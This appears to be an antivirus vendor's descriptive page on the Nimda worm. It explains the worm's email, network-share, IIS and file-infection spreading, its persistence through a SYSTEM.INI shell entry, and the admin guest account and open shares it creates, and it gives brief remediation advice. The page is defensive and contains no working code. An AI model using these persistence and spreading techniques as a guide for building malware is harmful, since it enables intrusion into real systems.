AnVir Software, Security Suite, Task Manager Pro, Virus Destroyer: Virus Nimda

Virus Nimda

Nimda is Internet mass-mailing worm that utilizes multiple methods to spread itself and infect files. The name of the virus came from the reversed spelling of "admin".

It arrives as an attachment, README.EXE file, in an email. It does not require the email receiver to open the attachment for it to execute. It uses a known vulnerability in Internet Explorer-based email clients to execute the file attachment automatically. When it executes via email, it drops and then runs executable copies of itself in the temp folder to perform its infection routines.

It spreads in four modes: via email, via network shared drives, via unpatched IIS servers and via file infection.

It infects executable files by prepending itself to these. When an infected file is run, it extracts and runs the original host file, hiding itself.

It also copies itself to a LOAD.EXE file and to a RICHED20.DLL file in the Windows System folder. It sets the attributes of both files as Hidden and System. RICHED20.DLL overwrites a legitimate RICHED20.DLL file that is used to view document files. In such case you should replace RICHED20.DLL from original OS package.

On WinNT/2K systems, it copies itself to a MMC.EXE in the default Windows folder, which may overwrite a system program Microsoft Management Console. It copy itself in the startup folder for automatic execution.

Dropped EXE files have the hidden attribute set and the default icon of HTML files so that infected users do not easily detect the presence of this worm.

The worm creates itself as .eml and .nws files and copy them to the open network shares.

To run at startup, it makes an entry in the SHELL key at the BOOT section of SYSTEM.INI:
Shell = explorer.exe load.exe -dontrunold

It attaches itself to EXPLORER when running on WinNT and registers itself as a service on Win9x to avoid detection.

Besides spreading via networks, it changes system settings to compromise network security and to make infected systems more vulnerable to Trojan attacks.

The worm creates open network shares on the infected computer, allowing access to the system. During this process the worm creates the guest account with Administrator privileges. It also shares the C:\ folder as C$ and shares all fixed drives C - Z.

This worm uses a privilege elevation exploit to allow an infected computer to execute commands on a victim computer, which may receive requests when this exploit is employed.

Nimda infects unpatched Microsoft IIS web servers. If you visit a compromised Web server, you will be prompted to download an .eml (Outlook Express) email file, which contains the worm as an attachment. You can disable "File Download" in your Internet Explorer internet security zones to prevent this compromise.